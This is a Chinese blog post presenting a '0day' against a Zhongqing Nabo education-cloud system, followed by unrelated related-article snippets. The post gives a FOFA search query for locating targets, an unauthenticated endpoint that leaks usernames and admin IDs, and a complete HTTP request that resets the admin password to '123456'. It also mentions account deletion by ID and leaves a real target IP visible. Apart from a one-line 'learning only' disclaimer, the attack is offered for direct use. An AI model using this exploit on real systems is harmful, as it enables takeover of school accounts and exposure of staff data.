(0day通用)中庆纳博某系统敏感信息泄露+未授权修改密码

news/2024/7/7 22:43:04

申明:本次测试只作为学习用处,请勿未授权进行渗透测试,切勿用于其它用途!
1.漏洞背景
北京中庆纳博信息技术有限公司,简称中庆纳博,是有20年历史的中庆集团旗下核心企业,专注于教育信息化的深度应用领域。产品以教育软件为主,核心产品为“中庆教育云”平台。公司成立三年多来,客户已遍及全国各地,“中庆教育云”亦成为业内的知名品牌。
2.fofa语法
fofa语法:“中庆纳博”
在这里插入图片描述
3.漏洞利用
http://xxxxxx/api/TeacherQuery/SearchTeacherInSiteWithPagerRecords
在这里插入图片描述

访问此链接,可以看见泄露用户名,以及管理id。然后可以通过 用户名重置密码为默认密码123456

POST /api/User/ResetPassword HTTP/1.1
Host: xxxxxxxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: application/json, text/plain, /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 23
Origin: http://117.36.154.34:8010
DNT: 1
Connection: close
Referer: http://xxxxxxxx/default/admin/user/index{"loginName":"admin"}也可以通过 id删除账户

http://lihuaxi.xjx100.cn/news/1289236.html

相关文章

通过shell的while read line对一个文件中的考试分数进行人员分组

通过shell的while read line对一个文件中的考试分数进行人员分组,并记录分数 [rootecs-18b3 ~]# cat split.sh #!/bin/bash while read line donameecho ${line}|awk {print $1}scoreecho ${line}|awk {print $2}if [ ${score} -gt 90 ];thenecho -e "${name…

linux:Docker 退出容器但不关闭当前容器

参考: Docker 退出容器但不关闭当前容器_docker 怎么把容器hold_leoe_的博客-CSDN博客

前后端交互时数据加密的目的是什么

对于新手在网页开发的时候,总会遇到对数据加密的误解,尤其是刚开始接触相关代码看了一些用例之后90%的人免不了会想过一个问题,就是前后端加解密是为了什么。 例如下面的代码 后端加密代码 import javax.crypto.Cipher; import javax.cryp…

代码随想录算法训练营第2天| 977.有序数组的平方 ,209.长度最小的子数组 ,59.螺旋矩阵II

今日学习的文章链接&#xff0c;或者视频链接 第一章 数组part02 第一章 数组part02 自己看到题目的第一想法 看完代码随想录之后的想法 977: class Solution { public:vector<int> sortedSquares(vector<int>& nums) {int left 0;int right nums.size…

chatgpt赋能python:Python迭代运算:概述、应用及效果分析

Python迭代运算&#xff1a;概述、应用及效果分析 在Python编程领域中&#xff0c;迭代运算是一项基础性操作。它不仅适用于循环遍历数据&#xff0c;还支持函数式编程中的高阶函数应用&#xff08;例如map、filter等&#xff09;。本文将从多个方面探讨Python迭代运算的应用和…

MIT 6.824: Go并发相关的协程问题

1 为什么当结构体很大时&#xff0c;倾向于使用pointer receiver ? 可以避免对结构体进行复制&#xff0c;从而提高性能和减少内存占用; 但是要注意使用pointer receiver时不要出现空指针异常&#xff0c;在方法中要对指针接受者进行判断 2 当结构体中含有sync.Mutex类型的成…

【Rust 基础篇】Rust 结构体详解

文章目录 引言一、结构体的定义二、结构体实例化1、声明式实例化2、可变实例化 三、结构体的方法四、结构体的关联函数五、结构体的特性1、元组结构体2、类单元结构体 六、结构体的注意事项1、字段的可见性2、结构体的大小3、模式匹配 总结 引言 在Rust中&#xff0c;结构体&a…

[uni-app] web-view组件页面添加u-navbar, u-navbar无法显示问题处理

uni-app 内部调整H5页面 (webview组件),需要条件导航问题 在iOS/Android下, web-view占满了全屏, <template><view><web-view class"mywebview" :src"pageUrl"></web-view></view> </template>此时添加一个 <u-na…